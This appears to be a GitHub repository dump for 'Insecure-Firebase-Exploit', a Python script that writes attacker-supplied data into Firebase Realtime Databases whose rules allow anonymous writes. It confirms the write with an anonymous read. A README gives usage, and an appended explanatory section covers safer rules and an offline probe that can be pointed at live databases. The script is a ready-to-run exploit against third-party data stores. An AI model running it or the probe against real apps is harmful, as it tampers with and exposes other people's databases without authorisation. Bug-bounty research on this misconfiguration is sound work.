├── Firebase_Exploit.py
├── README.md
├── Write-Exploit.png
└── file.json

/Firebase_Exploit.py:
--------------------------------------------------------------------------------
# Author:
'''
Muhammad Khizer Javed
Cyber Security Researcher & Bug Bounty Hunter
whoami.securitybreached.org
Updated: 06-05-2024
'''
import sys
import requests

print("""
<============================================================================================================>
||  Firebase Database Permissions Exploit                                                                 ||
||  Usage : Provide the target DB name, the node to create and the information to write                   ||
||  Blog  : Read the full blog post about this bug class                                                  ||
||  Url   : https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty||
||  Info  : A simple Python exploit to write data to insecure/vulnerable Firebase databases,              ||
||          commonly found inside mobile apps.                                                            ||
||          If the app owner has set the security rules to true for both "read" & "write",                ||
||          an attacker can probably dump the database and write their own data to it.                    ||
<============================================================================================================>
""")

line = "<<======================================================================>>"

# Collect the input for the exploit
print("[>] Input Data for exploit\n")
site = input("[+] Enter firebase Database Name : ")
file = input("[+] Enter filename : ")
name = input("[+] Enter name : ")
email = input("[+] Enter email : ")
website = input("[+] Enter Website : ")
message = input("[+] Enter A Message : ")

# Payload: an unauthenticated PUT to https://<db>.firebaseio.com/<node>.json
# creates or overwrites that node through the Realtime Database REST API
site_url = f"https://{site}.firebaseio.com/{file}.json"
data = {
    "Exploit": "Successful",
    "website": website,
    "email": email,
    "name": name,
    "message": message
}

try:
    response = requests.put(site_url, json=data, timeout=15)
except requests.exceptions.RequestException as e:
    print(f"[x] Error: {e}")
    sys.exit(1)

# Result of the write
print(line)
if response.status_code == 200:
    print("[*] Exploited\n")
    print(f"File Created: {site_url}\n")
else:
    print("[*] Not Exploited\n")
    print("No File Created")

print(line)
print("""If the write reports 'Successfully Exploited' but the read below
returns 'Permission denied', the rules allow anonymous writes but not reads:
the data was written but cannot be read back. Verify by visiting the URL.""")
print(" ")

# Fetch and print the node that was just written (anonymous read)
print("[>] Response\n")
try:
    r = requests.get(site_url, timeout=15)
    print(r.text)
except requests.exceptions.RequestException as e:
    print(f"[x] Error: {e}")

print(line)

# Reasoning: interpret the status code of the write
if response.status_code == 200:
    print("[>>] Successfully Exploited")
elif response.status_code == 401:
    print("[x] Not Exploitable \n[!] Reason: All Permissions Denied")
elif response.status_code == 404:
    print("[x] Database Not Found \n[!] Reason: Firebase Database Not Found")
else:
    print(f"[x] Unknown Error \n[!] Reason: {response.status_code}\n")
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Insecure-Firebase-Exploit
A simple Python exploit to write data to insecure/vulnerable Firebase databases, commonly found inside mobile apps. If the owner of the app has set the security rules to true for both "read" & "write", an attacker can probably dump the database and write their own data to the Firebase DB.

# Blog:

https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/

# Usage:

`Firebase_Exploit.py` is the updated version of the exploit I made.
Simply give the database name, the file name (node) you wish to create and your information,
and it writes them to the insecure/vulnerable Firebase database.

![Usage POC Image](/Write-Exploit.png)

**python Firebase_Exploit.py**

```
[+] Enter firebase Database Name :
[+] Enter filename :
[+] Enter name :
[+] Enter email :
[+] Enter Website :
[+] Enter A Message :
```

--------------------------------------------------------------------------------
/Write-Exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit/3cd3d2639dd8070b16a81c14690766f517381bf7/Write-Exploit.png
--------------------------------------------------------------------------------
/file.json:
--------------------------------------------------------------------------------
{"success":"true"}
--------------------------------------------------------------------------------
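The README and the script above describe the bug class in prose only: rules set to `true` for both `.read` and `.write`, a REST `PUT` that succeeds with 200, a `401` with `Permission denied` when the rules hold, and a read-back to confirm the write landed. The following is an added example (not code from this repository or its author) that puts those pieces into checkable functions: the insecure rules document next to a safer default, a verdict function using the same status-code mapping the exploit uses, and a read/write probe. `FakeSession`, `FakeResponse` and the sample bodies are constructed stand-ins for `requests` so the example runs offline; the root-level probe URL and the safer rules are my assumptions, not something the repo states.

```python
"""Added example, not part of the Insecure-Firebase-Exploit repository.

Assumptions (mine, not the repo's): the database root is probed anonymously at
https://<name>.firebaseio.com/.json, and responses are interpreted with the
mapping the exploit script uses (200 -> allowed, 401 + "Permission denied"
-> rules enforced, 404 -> no such database). FakeSession stands in for
requests.Session so this runs offline.
"""
import json

# The misconfiguration the README describes: every path is readable and
# writable by anyone on the internet, no auth needed.
INSECURE_RULES = {"rules": {".read": True, ".write": True}}

# A safer default (assumed, not from the repo): deny at the root, then open a
# per-user subtree only to the authenticated owner of that subtree.
SAFER_RULES = {
    "rules": {
        ".read": False,
        ".write": False,
        "users": {
            "$uid": {
                ".read": "auth != null && auth.uid == $uid",
                ".write": "auth != null && auth.uid == $uid",
            }
        },
    }
}


def rules_are_world_open(rules: dict) -> bool:
    """True when the root grants unauthenticated read AND write."""
    root = rules.get("rules", {})
    return root.get(".read") in (True, "true") and root.get(".write") in (True, "true")


def classify(status: int, body: str) -> str:
    """Map one REST response to a verdict (same mapping as the exploit script)."""
    if status == 200:
        return "open"
    if status == 401:
        try:
            err = json.loads(body).get("error", "")
        except ValueError:
            err = ""
        return "denied" if "Permission denied" in err else "unauthorized"
    if status == 404:
        return "not_found"
    return f"unknown:{status}"


def db_url(name: str, path: str = "") -> str:
    """REST URL for a node; an empty path addresses the database root."""
    return f"https://{name}.firebaseio.com/{path}.json"


def write_confirmed(payload: dict, read_body: str) -> bool:
    """True when the anonymous read returns exactly what was written."""
    try:
        return json.loads(read_body) == payload
    except ValueError:
        return False


class FakeResponse:
    def __init__(self, status: int, body: str):
        self.status_code = status
        self.text = body


class FakeSession:
    """Constructed stand-in for requests.Session: answers from a lookup table
    keyed by (method, url); anything unlisted reads as 404 / write denied."""
    def __init__(self, table: dict):
        self.table = table

    def get(self, url, **kw):
        return FakeResponse(*self.table.get(("GET", url), (404, "")))

    def put(self, url, json=None, **kw):
        return FakeResponse(*self.table.get(("PUT", url), (401, '{"error": "Permission denied"}')))


def probe(name: str, session) -> dict:
    """Anonymous read of the root plus an anonymous write to a scratch node."""
    read = session.get(db_url(name))
    write = session.put(db_url(name, "probe"), json={"probe": True})
    return {"read": classify(read.status_code, read.text),
            "write": classify(write.status_code, write.text)}


if __name__ == "__main__":
    # Constructed responses for a world-open database and a locked one.
    open_db = FakeSession({("GET", db_url("demo-db")): (200, '{"users": {}}'),
                           ("PUT", db_url("demo-db", "probe")): (200, '{"probe": true}')})
    locked_db = FakeSession({("GET", db_url("demo-db")): (401, '{"error" : "Permission denied"}')})
    print("open rules world-open:", rules_are_world_open(INSECURE_RULES))
    print("open db  :", probe("demo-db", open_db))
    print("locked db:", probe("demo-db", locked_db))
```

To run it against a live target, replace `FakeSession` with `requests.Session()`; the `get(url)` and `put(url, json=...)` calls are the same ones the exploit script makes. Note the asymmetric case the script's own message warns about: a database with `.write: true` but `.read: false` yields `{"read": "denied", "write": "open"}`, and `write_confirmed` then returns False because the read-back body is the permission error rather than the payload.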